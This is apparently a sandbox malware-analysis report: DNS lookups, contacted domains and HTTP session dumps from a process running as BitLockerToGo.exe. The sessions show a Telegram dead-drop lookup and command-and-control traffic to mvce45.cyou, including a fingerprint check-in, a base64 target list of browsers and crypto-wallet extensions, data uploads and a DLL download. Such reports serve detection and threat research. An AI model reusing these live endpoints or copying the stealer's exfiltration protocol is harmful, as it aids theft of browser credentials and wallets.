| Nov 21, 2024 15:48:33.662452936 CET | 1.1.1.1 | 192.168.2.8 | 0xd34d | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.171911001 CET | 1.1.1.1 | 192.168.2.8 | 0x6ceb | No error (0) | scdn1f005.wpc.ad629.nucdn.net | sni1gl.wpc.nucdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.171911001 CET | 1.1.1.1 | 192.168.2.8 | 0x6ceb | No error (0) | sni1gl.wpc.nucdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.769146919 CET | 1.1.1.1 | 192.168.2.8 | 0xe2de | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false |
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.792397976 CET1.1.1.1192.168.2.80x21f8No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.792397976 CET1.1.1.1192.168.2.80x21f8No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.792860031 CET1.1.1.1192.168.2.80x1303No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.869188070 CET1.1.1.1192.168.2.80xdd95No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.871967077 CET1.1.1.1192.168.2.80x3356No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.871967077 CET1.1.1.1192.168.2.80x3356No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873042107 CET1.1.1.1192.168.2.80x1ae3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873042107 CET1.1.1.1192.168.2.80x1ae3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.894457102 CET1.1.1.1192.168.2.80x8418No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.894709110 CET1.1.1.1192.168.2.80x46bdNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.170242071 CET1.1.1.1192.168.2.80xfddaNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.172148943 CET1.1.1.1192.168.2.80x2a03No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.172238111 CET1.1.1.1192.168.2.80x1685No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.174755096 CET1.1.1.1192.168.2.80xb478No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.189399958 CET1.1.1.1192.168.2.80xb2f9No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.189399958 CET1.1.1.1192.168.2.80xb2f9No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.338376045 CET1.1.1.1192.168.2.80xfe92No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.338376045 CET1.1.1.1192.168.2.80xfe92No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.663975000 CET1.1.1.1192.168.2.80x90c0No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.663975000 CET1.1.1.1192.168.2.80x90c0No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.239820004 CET1.1.1.1192.168.2.80xfbcbNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.239820004 CET1.1.1.1192.168.2.80xfbcbNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.278629065 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.278629065 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.294099092 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.294099092 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.300604105 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.300604105 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.312470913 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.312470913 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.321873903 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.321873903 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
• slscr.update.microsoft.com
• t.me
• mvce45.cyou
• www.google.com
• fs.microsoft.com
• login.live.com
• api.edgeoffer.microsoft.com
• chrome.cloudflare-dns.com
• https:
  • assets2.msn.com
  • browser.events.data.msn.com
• edgeassetservice.azureedge.net
• data-edge.smartscreen.microsoft.com
• clients2.googleusercontent.com
• msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49710 | 52.149.20.212 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:47:25 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-11-21 14:47:25 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: 0908f55d-e881-4a9a-b674-345536c08dfe
MS-RequestId: 7060e7d6-d5ce-4a85-be77-5baf8b680049
MS-CV: RR866FoqG0CAM4AO.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Thu, 21 Nov 2024 14:47:25 GMT
Connection: close
Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49711 | 149.154.167.99 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:47:51 UTC | 86 | OUT | GET /fu4chmo HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:47:51 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 21 Nov 2024 14:47:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12314
Connection: close
Set-Cookie: stel_ssid=fbd8ea196c06cb7d16_1201143984790985881; expires=Fri, 22 Nov 2024 14:47:51 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-11-21 14:47:51 UTC | 12314 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @fu4chmo</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49712 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:47:54 UTC | 226 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:47:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:47:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:47:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49713 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:47:56 UTC | 318 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:47:56 UTC | 256 | OUT | Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="hwid"A1875C54FE4B3837734947-a33c7340-61ca------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------GDBFBFCBFBKECAAKJKFB--
2024-11-21 14:47:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:47:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:47:57 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 7c 31 7c 30 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|13feffb011a79c40536aa4a7f1267eff|1|0|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49714 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:47:59 UTC | 318 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:47:59 UTC | 331 | OUT | Data Ascii: ------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------BAAAKJDAAFBAAKEBAAKFCont
2024-11-21 14:48:00 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:47:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:48:00 UTC | 2192 | IN | Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49715 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:01 UTC | 318 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:01 UTC | 331 | OUT | Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------GCAEHDBAAECBFHJKFCFBCont
2024-11-21 14:48:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:48:02 UTC | 5685 | IN | Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49717 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:03 UTC | 318 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:03 UTC | 332 | OUT | Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------IIEHJKJJJECFHJJJKKECCont
2024-11-21 14:48:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:48:04 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49716 | 52.149.20.212 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:04 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-11-21 14:48:04 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
MS-CorrelationId: 9c6ad1e9-657a-439b-a6a7-b52224995e74
MS-RequestId: d79e00a7-3dcb-45af-b0b0-302d3b7275e3
MS-CV: ACxs+sG/vUmfr3cb.0
X-Microsoft-SLSClientCache: 1440
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Thu, 21 Nov 2024 14:48:04 GMT
Connection: close
Content-Length: 30005
2024-11-21 14:48:04 UTC | 15824 | IN | Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-21 14:48:05 UTC | 14181 | IN | Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49718 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:06 UTC | 319 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 6913
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:06 UTC6913OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------IIIDAKJDHJKFHIEBFCGHCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:07 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49719 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:07 UTC | 234 | OUT | GET /sqlo.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:08 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:07 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Thursday, 21-Nov-2024 14:48:07 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  10192.168.2.84972049.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:13 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 489
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:13 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------JEHDHIEGIIIDHIDHDHJJCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:14 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:48:14 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49723 | 172.217.21.36 | 443 | 5904 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:19 UTC | 603 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
